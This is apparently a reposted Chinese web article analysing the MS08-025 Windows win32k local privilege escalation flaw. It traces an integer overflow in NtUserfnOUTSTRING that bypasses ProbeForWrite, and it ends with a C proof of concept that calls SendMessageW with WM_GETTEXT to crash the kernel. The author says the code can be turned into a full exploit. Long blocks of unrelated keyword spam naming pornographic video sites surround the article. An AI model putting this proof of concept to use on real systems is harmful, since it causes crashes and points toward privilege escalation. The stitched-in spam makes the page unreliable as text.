精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

ms08025內(nèi)核漏洞深度分析

安全 黑客攻防
成功利用此漏洞的本地攻擊者可以完全控制受影響的系統(tǒng)。 攻擊者可隨后安裝程序;查看、更改或刪除數(shù)據(jù);或者創(chuàng)建新帳戶。這是用于 Windows 2000、Windows XP、Windows Server 2003、Windows Vista 和 Windows Server 2008 所有受支持版本的重要安全更新。

漏洞對(duì)于系統(tǒng)用戶來(lái)說(shuō)并不陌生,幾乎是所有的系統(tǒng)和軟件都會(huì)有漏洞產(chǎn)生。我們幾乎就是在填補(bǔ)漏洞和發(fā)現(xiàn)新漏洞中使用系統(tǒng)的。ms08025漏洞是一個(gè)可被攻擊者利用的漏洞,本篇文章分析了ms08025漏洞補(bǔ)丁,下面我們就從NtUserfnOUTSTRING 函數(shù)中的問(wèn)題來(lái)展開(kāi)我們的分析。

.text:BF86FB04 ; int __stdcall NtUserfnOUTSTRING(int,int,int,PVOID Address,int,int,int)
.text:BF86FB04 __stdcall NtUserfnOUTSTRING(x, x, x, x, x, x, x) proc near
.text:BF86FB04 ; CODE XREF: xxxDefWindowProc(x,x,x,x)+6Ep
.text:BF86FB04 ; NtUserMessageCall(x,x,x,x,x,x,x)+61p
.text:BF86FB04 ; xxxSendMessageToClient(x,x,x,x,x,x,x)-Ep
.text:BF86FB04 ; xxxSendMessageToClient(x,x,x,x,x,x,x)+6Dp
.text:BF86FB04 ; xxxWrapCallWindowProc(x,x,x,x,x)-4Bp
.text:BF86FB04 ; xxxWrapCallWindowProc(x,x,x,x,x)+60p ...
.text:BF86FB04
.text:BF86FB04 var_24  = dword ptr -24h
.text:BF86FB04 var_20  = dword ptr -20h
.text:BF86FB04 UserBuffer  = dword ptr -1Ch
.text:BF86FB04 ms_exc  = CPPEH_RECORD ptr -18h
.text:BF86FB04 arg_0   = dword ptr  8
.text:BF86FB04 arg_4   = dword ptr  0Ch
.text:BF86FB04 arg_8   = dword ptr  10h
.text:BF86FB04 Address = dword ptr  14h
.text:BF86FB04 arg_10  = dword ptr  18h
.text:BF86FB04 arg_14  = dword ptr  1Ch
.text:BF86FB04 arg_18  = dword ptr  20h
.text:BF86FB04
.text:BF86FB04 ; FUNCTION CHUNK AT .text:BF86FAE1 SIZE 0000001E BYTES
.text:BF86FB04
.text:BF86FB04 push14h
.text:BF86FB06 pushoffset unk_BF98D250
.text:BF86FB0B call__SEH_prolog
.text:BF86FB0B
.text:BF86FB10 xor edx, edx
.text:BF86FB12 mov [ebp+ms_exc.disabled], edx
.text:BF86FB15 mov eax, [ebp+var_20]
.text:BF86FB18 mov ecx, 7FFFFFFFh
.text:BF86FB1D and eax, ecx
.text:BF86FB1F mov esi, [ebp+arg_18]
.text:BF86FB22 shl esi, 1Fh
.text:BF86FB25 or  eax, esi
.text:BF86FB27 mov [ebp+var_20], eax
.text:BF86FB2A mov esi, eax
.text:BF86FB2C xor esi, [ebp+arg_8]  -> esi = 緩沖區(qū)長(zhǎng)度
.text:BF86FB2F and esi, ecx
.text:BF86FB31 xor eax, esi
.text:BF86FB33 mov [ebp+var_20], eax
.text:BF86FB36 cmp [ebp+arg_18], edx  -> 如果是 ansi 方式就直接進(jìn)行檢查

否則需要計(jì)算unicode的大小
.text:BF86FB39 jnz short loc_BF86FB47
.text:BF86FB39
.text:BF86FB3B lea esi, [eax+eax]<- 注意這里,問(wèn)題就在這

此時(shí) eax = unicode字符串的長(zhǎng)度,
<- 當(dāng) eax = 0x80000000 的時(shí)候 eax + eax = 0x100000000,32位的寄存器
<- 被溢出了,esi = 0
.text:BF86FB3E xor esi, eax
.text:BF86FB40 and esi, ecx
.text:BF86FB42 xor eax, esi
.text:BF86FB44 mov [ebp+var_20], eax -> 保存unicode占用的空間大小
.text:BF86FB44
.text:BF86FB47
.text:BF86FB47 loc_BF86FB47:   ; CODE XREF: NtUserfnOUTSTRING(x,x,x,x,x,x,x)+35j
.text:BF86FB47 mov [ebp+var_24], edx
.text:BF86FB4A mov esi, [ebp+Address]
.text:BF86FB4D mov [ebp+UserBuffer], esi
.text:BF86FB50 xor ebx, ebx
.text:BF86FB52 inc ebx
.text:BF86FB53 pushebx ; Alignment
.text:BF86FB54 and eax, ecx
.text:BF86FB56 pusheax ; Length <- 由于 eax = 0,所以ProbeForWrite被繞過(guò)
.text:BF86FB57 pushesi ; Address
.text:BF86FB58 callds:ProbeForWrite(x,x,x)


bf80a1b0 e96ef4ffff   jmp   win32k!xxxRealDefWindowProc+0x1235 (bf809623)
bf80a1b5 d1e8 shr eax,1
bf80a1b7 894510   mov [ebp+0x10],eax
bf80a1ba ebf1 jmpwin32k!xxxRealDefWindowProc+0x190 (bf80a1ad)
bf80a1bc 8b4514   mov eax,[ebp+0x14]
bf80a1bf f6400780 testbyte ptr [eax+0x7],0x80
bf80a1c3 8b4008   mov eax,[eax+0x8]
bf80a1c6 7408 jz win32k!xxxRealDefWindowProc+0x105 (bf80a1d0)
bf80a1c8 c60000   mov byte ptr [eax],0x0
bf80a1cb e951f4ffff   jmp   win32k!xxxRealDefWindowProc+0x1225 (bf809621)
bf80a1d0 668910  mov [eax],dx<- 在這里,對(duì)前面?zhèn)魅氲闹羔樳M(jìn)行了2個(gè)字節(jié)的寫(xiě)操作,寫(xiě)入的數(shù)據(jù)為0
bf80a1d3 e949f4ffff   jmp   win32k!xxxRealDefWindowProc+0x1225 (bf809621)
bf80a1d8 6a00 push0x0
bf80a1da 6a02 push0x2
bf80a1dc ff7638   pushdword ptr [esi+0x38]
bf80a1df e8d1690200   callwin32k!BuildHwndList (bf830bb5)
bf80a1e4 8bf8 mov edi,eax
bf80a1e6 85ff testedi,edi
bf80a1e8 0f8433f4ffff jewin32k!xxxRealDefWindowProc+0x1225 (bf809621)
bf80a1ee 8d7710   lea esi,[edi+0x10]

那么怎么觸發(fā)ms08025漏洞呢,我又分析了user32.dll 和 win32k!NtUserMessageCall,發(fā)現(xiàn)觸發(fā)這個(gè)漏洞很簡(jiǎn)單,只需要調(diào)用 SendMessageW 發(fā)送WM_GETTEXT 消息就能夠觸發(fā)了,下面是poc代碼(注,改代碼運(yùn)行后由于在內(nèi)核寫(xiě)了未映射的內(nèi)存,會(huì)直接藍(lán)屏,要改成可用的exploit,可以參考我以前的exploit)

 

  1.  
  2. #include <stdio.h> 
  3. #include <windows.h> 
  4.  
  5. int main(int argc,char *argv[])  
  6. {  
  7. DWORDdwHookAddress = 0x80000000;  
  8.  
  9. printf( "\tMS08-025 Local Privilege Escalation Vulnerability Exploit(POC)\n\n" );  
  10. printf( "Create by Whitecell's Polymorphours@whitecell.org 2008/04/10\n" );  
  11.  
  12. SendMessageW( GetDesktopWindow(), WM_GETTEXT, 0x80000000, dwHookAddress );  
  13. return 0;  

 

【編輯推薦】

  1. Web應(yīng)用防火墻的功能與價(jià)值
  2. xss攻擊 Web安全新挑戰(zhàn)
  3. 防火墻安全測(cè)試之規(guī)則分析工具
  4. Web應(yīng)用防火墻的主要特性
  5. 防止入侵從Web應(yīng)用安全漏洞做起
責(zé)任編輯:張啟峰 來(lái)源: xfocu
相關(guān)推薦

2009-02-20 16:56:53

2017-01-15 23:46:37

2015-03-11 16:23:01

2017-01-15 22:51:16

2020-10-12 09:43:41

iOS 14漏洞蘋(píng)果

2014-06-09 09:19:10

2010-09-16 14:36:20

2014-12-03 10:37:45

2020-04-01 10:28:12

Apache HBas數(shù)據(jù)結(jié)構(gòu)算法

2015-03-13 10:06:55

2017-03-10 20:26:27

2013-05-23 10:48:14

EPATHOBJ 0d0day漏洞

2014-07-29 15:44:33

Linux內(nèi)核Crash

2025-04-11 09:37:31

2024-12-17 16:09:36

2009-10-20 09:58:38

2015-02-06 15:51:11

2013-07-24 14:06:48

2022-03-10 09:41:15

漏洞Linux內(nèi)核

2020-10-19 14:01:34

漏洞Linux代碼
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)

成人免费网站www网站高清| 亚洲AV第二区国产精品| 仙踪林久久久久久久999| 91精品久久久久久久99蜜桃| 又大又硬又爽免费视频| 黄色在线网站| 国产做a爰片久久毛片| 性色av一区二区咪爱| 影音先锋制服丝袜| av成人综合| 欧美在线观看一区| 黄色一级片av| 丁香婷婷在线| 9l国产精品久久久久麻豆| 国产成人精品亚洲精品| 男女性高潮免费网站| 久操精品在线| 亚洲精品一区二区三区在线观看 | 日韩欧美一区二区免费| 无码人妻h动漫| 亚洲淫性视频| 国产精品麻豆久久久| 九9re精品视频在线观看re6| 国产精品无码久久av| 久久国产精品99国产| 欧美xxxx18性欧美| 国产肥白大熟妇bbbb视频| 成人av动漫| 欧美疯狂做受xxxx富婆| 最近免费中文字幕中文高清百度| 成人性生交大片免费看网站 | 青青草原国产免费| 都市激情在线视频| 久久久久高清精品| 久久99国产精品99久久| 国 产 黄 色 大 片| 国产在线播放一区二区三区| 国产精品日韩av| 伦av综合一区| 一本久道综合久久精品| 欧美极品美女视频网站在线观看免费 | 国产玉足脚交久久欧美| av片在线观看永久免费| 国产精品久久久久桃色tv| 日韩欧美视频一区二区| 青青草免费在线| 久久综合视频网| 久久爱av电影| 日韩二区三区| 91香蕉视频mp4| 久久久免费看| 亚洲人视频在线观看| 99久久99久久精品免费看蜜桃| 国产不卡一区二区在线观看| 丰满岳乱妇国产精品一区| 国产精品1区2区| 99精品在线直播| 亚洲国产精品久久久久爰性色| 国产乱子伦一区二区三区国色天香| 国产在线98福利播放视频| 91久久精品国产91性色69| 国内精品久久久久影院色| 91午夜在线播放| av免费在线不卡| 国产黑丝在线一区二区三区| 成人18视频| 少妇人妻偷人精品一区二区| 国产99精品在线观看| 国产欧美一区二区三区另类精品| 欧美一级免费片| 99久久综合99久久综合网站| 欧美日韩视频在线一区二区观看视频| 国产视频精品久久| 国产精品欧美精品| 波多野结衣 作品| 国产高清中文字幕在线| 色婷婷精品大视频在线蜜桃视频| 天天干天天爽天天射| 精品久久国产一区| 亚洲国产天堂网精品网站| 欧美一级免费看| 视频一区二区在线观看| 国际av在线| 中文字幕五月欧美| 隔壁人妻偷人bd中字| 亚洲优女在线| 欧美剧情片在线观看| 国产精品果冻传媒| 美日韩中文字幕| 久久精品美女视频网站 | 亚洲一区二区三区四区中文字幕| 日本国产在线播放| 国产精品久久乐| 欧美成人精品1314www| 自拍偷拍中文字幕| 亚洲欧美日韩高清在线| 992tv在线成人免费观看| 中文字幕无线码一区| 成人精品视频一区二区三区尤物| 欧美成人在线免费观看| 黄色成年人视频在线观看| 岛国av一区二区在线在线观看| 污视频网站观看| 美女一区2区| 色噜噜国产精品视频一区二区 | 午夜精品久久99蜜桃的功能介绍| 2019最新中文字幕| 97精品人妻一区二区三区香蕉| av亚洲精华国产精华精华| 亚洲一区二区精品在线观看| 岛国片av在线| 欧美一区中文字幕| 国产在线观看h| 日韩视频免费| 亚洲最大的网站| av在线免费播放网站| 黄色成人av在线| 国产精品日日摸夜夜爽| 色婷婷综合网| 国产精品极品美女在线观看免费| 熟妇高潮一区二区三区| 亚洲欧美乱综合| 国产91色在线观看| 国内精品久久久久久久影视简单| 国模视频一区二区三区| 国产免费黄色大片| 国产精品久久看| 国产成人精品无码播放| 欧美人成在线观看ccc36| 久久久久国产精品www| 国产亲伦免费视频播放| 中文字幕佐山爱一区二区免费| 免费看国产黄色片| 精品国产不卡| 国产成人精品在线视频| 免费看男男www网站入口在线| 亚洲国产欧美日韩另类综合 | 牛牛视频精品一区二区不卡| 欧美黑人xxxx| 国产wwwwwww| 自拍偷拍欧美激情| 999热精品视频| 围产精品久久久久久久| 国产日韩欧美一二三区| 91精品专区| 在线观看亚洲精品| 免费看91的网站| 日本中文在线一区| 色姑娘综合av| 成人在线高清| 久久精品视频亚洲| hs视频在线观看| 一区二区三区91| 国产精品一区二区在线免费观看| 国精品一区二区三区| 肥熟一91porny丨九色丨| 999av小视频在线| 国产视频精品久久久| 日韩电影在线观看一区二区| 久久精品一区二区| 欧美一级特黄a| 久久久国产精品| 69174成人网| 97蜜桃久久| 亚洲欧美国内爽妇网| 中文字幕人妻互换av久久| 中文字幕免费观看一区| 亚洲第一成肉网| 欧美精品一卡| 精品无人乱码一区二区三区的优势| 国产精品xx| 在线观看国产精品淫| 国产乱人乱偷精品视频a人人澡| 一区二区三区在线免费视频 | 国产喷水福利在线视频| 一区二区三区四区高清精品免费观看| 熟妇高潮一区二区| 日韩黄色小视频| 在线观看成人免费| 久久久久久久久久久久久久久久久久久久 | 欧美一区二区三区白人| 国产五月天婷婷| 久久精品人人做人人爽97| 午夜精品免费看| 国产精品hd| 日本成人三级电影网站| 亚洲资源在线| 午夜美女久久久久爽久久| 搞黄视频在线观看| 欧美一区二区高清| 伊人中文字幕在线观看| 综合久久国产九一剧情麻豆| 国产一线在线观看| 日本免费在线视频不卡一不卡二| 人人妻人人澡人人爽欧美一区| 色先锋久久影院av| 91精品视频大全| 久九九久频精品短视频| 久久久成人av| 飘雪影院手机免费高清版在线观看| 欧美日本精品一区二区三区| 五月婷婷激情网| **欧美大码日韩| 麻豆av免费观看| 丁香婷婷综合色啪| 亚洲精品自拍网| 亚洲另类视频| 在线观看成人免费| 日韩.com| 久久本道综合色狠狠五月| 国产一区二区久久久久| 国产成人综合av| av资源网在线播放| 操日韩av在线电影| jizz在线免费观看| 亚洲美女av在线播放| 亚洲黄色在线播放| 宅男在线国产精品| 中国老头性行为xxxx| 精品国产91久久久久久| 国产性猛交普通话对白| 国产精品大尺度| 欧美性受xxxx黑人| 久久久久国色av免费看影院| 7788色淫网站小说| 成人一二三区视频| 午夜性福利视频| 国产一区二区三区久久悠悠色av| 成人亚洲精品777777大片| 香蕉亚洲视频| 精品国产免费av| 亚洲激情一区| 青青草国产免费| 伊人久久大香线蕉综合热线| 欧美日韩亚洲激情| 日韩av一区二区三区| 欧美一区2区三区4区公司二百| 98视频精品全部国产| 91精品视频网站| 国产激情欧美| 国产精品久久中文| 欧美特黄aaaaaaaa大片| 欧美资源在线观看| 亚洲精品永久免费视频| 91av视频在线| 天堂av中文在线观看| 欧美最近摘花xxxx摘花| 亚洲欧美小说色综合小说一区| 97人人做人人爱| 都市激情国产精品| 91地址最新发布| 性爽视频在线| 日韩美女福利视频| 欧美成a人片在线观看久| 国产999精品久久久影片官网| xxxxxx欧美| 国产精品草莓在线免费观看| 成人日韩av| 91色视频在线导航| 嫩呦国产一区二区三区av| 成人三级在线| 国产欧美一区二区三区米奇| 精品国产91亚洲一区二区三区www| 久久久久久久久久久久久久久久久久久久 | 亚洲欧美国产精品久久久久久久| 欧美91精品久久久久国产性生爱| 国产一区二区av| 黄网页在线观看| 欧美激情aaaa| 亚洲人成午夜免电影费观看| 国产精品久久久久久久一区探花 | 国产一区二区精品免费| 午夜先锋成人动漫在线| 亚洲精美视频| 欧美精品国产| 日日摸天天爽天天爽视频| 久久99久久久久| 涩视频在线观看| 国产色综合久久| 免费看一级大片| 姬川优奈aav一区二区| 中文字幕乱码人妻无码久久| 日韩一级在线观看| 日韩福利一区二区| 久久久国产91| 最近高清中文在线字幕在线观看1| 国产精品va在线| 2021年精品国产福利在线| 日产精品高清视频免费| 欧美日韩1区| av在线无限看| 成人精品免费视频| 国产一区在线观看免费| 午夜欧美2019年伦理| 亚洲视频在线观看一区二区| 精品国产百合女同互慰| 成人免费在线电影| 欧美二区在线播放| 国产成人a视频高清在线观看| 国产经典一区二区三区| 久久久影院免费| 国产黄色一级网站| 国产麻豆精品theporn| 亚洲欧洲久久久| 午夜国产不卡在线观看视频| 国产精品国产三级国产aⅴ| 日韩精品视频在线免费观看| 伊人在我在线看导航| 国产精品对白刺激| 国产精品毛片视频| 樱空桃在线播放| 日本欧美大码aⅴ在线播放| 欧美xxxx×黑人性爽| 亚洲色图19p| 最新国产中文字幕| 亚洲美女在线视频| 九色porny丨入口在线| 91亚洲一区精品| 成人毛片免费看| 日本三级免费观看| 成人短视频下载| 欧美精品一区二区蜜桃| 56国语精品自产拍在线观看| 可以在线观看的av| 91精品国产电影| 精品久久ai| 国产自产在线视频| 国产福利视频一区二区三区| 日韩欧美视频免费观看| 91电影在线观看| 九色在线播放| 国产成人精品免费视频| 九九热精品视频在线观看| 欧美色图色综合| 91影院在线免费观看| 国产奶水涨喷在线播放| 欧美mv和日韩mv的网站| 制服丝袜在线播放| 亚洲永久免费观看| 欧美一区激情| 免费高清视频在线观看| 亚洲欧美另类在线| 99热这里是精品| 欧美精品中文字幕一区| 国产高清精品二区| 中文字幕不卡每日更新1区2区| 蜜桃久久久久久| 三级黄色在线观看| 91精品国产手机| 色呦呦在线资源| 国产嫩草一区二区三区在线观看 | 自拍偷拍 国产| 日本一区二区三区久久久久久久久不 | 粉嫩av懂色av蜜臀av分享| 色综合色狠狠天天综合色| 国产最新视频在线观看| 国产精品亚洲аv天堂网| 久久网站免费观看| 亚洲天堂网站在线| 尤物av一区二区| 日本美女一级片| 茄子视频成人在线| 成人在线国产| 三年中文在线观看免费大全中国| 一区二区三区在线看| 五月天丁香视频| 国产精品678| 天天插综合网| caopor在线| 91国模大尺度私拍在线视频| 午夜在线视频播放| 5566中文字幕一区二区| 亚洲女优在线| 国产破处视频在线观看| 日韩女优毛片在线| 免费在线小视频| 水蜜桃一区二区| 国产福利一区二区三区在线视频| 黄网在线观看视频| 中文字幕一区二区三区电影| 一区二区三区四区高清视频 | 黄色污污视频软件| 久久成人av网站| 日韩中文av| 天天色天天综合网| 精品久久久久久亚洲国产300| 阿v免费在线观看| 国产伦精品一区二区三区四区视频 | 欧美激情手机在线视频 | 日韩视频在线观看| 中国特级黄色大片| 欧美三级视频在线观看| a级片免费在线观看| 亚洲午夜精品一区二区| 99久久精品情趣| 999久久久久| 国产精品男人爽免费视频1| 尤物网精品视频| 影音先锋男人资源在线观看| 国产视频在线一区二区|